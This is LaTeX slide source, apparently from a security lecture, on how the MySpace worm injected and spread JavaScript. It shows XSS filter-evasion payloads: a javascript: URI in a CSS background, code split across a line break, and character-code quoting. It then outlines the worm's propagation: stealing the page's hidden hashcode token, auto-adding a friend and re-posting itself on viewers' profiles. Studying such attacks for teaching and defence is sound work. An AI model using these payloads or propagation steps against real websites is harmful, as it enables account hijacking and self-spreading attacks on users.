\section{MySpace Worm}

\subsection{Injecting Javascript}

	\begin{frame}\frametitle{\subsecname}

	MySpace blocks <script>, <body>, \ldots  and not CSS tags => javascript code.

	\begin{block}{Example}
		<div style="background:url('javascript:alert(1)')">
	\end{block}
	
	Command stored in an expression for quotes uses.
	Splitting \emph{Javascript} such as the browser read it but not the MySpace analyzer. 

	\begin{block}{Example}
		<div id="mycode" expr="alert('double quote: ' + String.fromCharCode(34))" style="background:url('java 
script:eval(document.all.mycode.expr)')">
	\end{block}

	\end{frame}

\subsection{Spreading}

	\begin{frame}\frametitle{\subsecname}

			\begin{enumerate}
				\item Getting the current page path
				\item Obtain the hash security
				\item Add a friend in the network
				\item Posting under the viewer's profile the same post
			\end{enumerate}

			\begin{enumerate}
				\item alert(eval('document.body.inne' + 'rHTML'));
				\item AQ=getHiddenParameter(AU,'hashcode');
				\item fuseaction=invite.addFriendsProcess;
				\item POST Html request
			\end{enumerate}
	\end{frame}



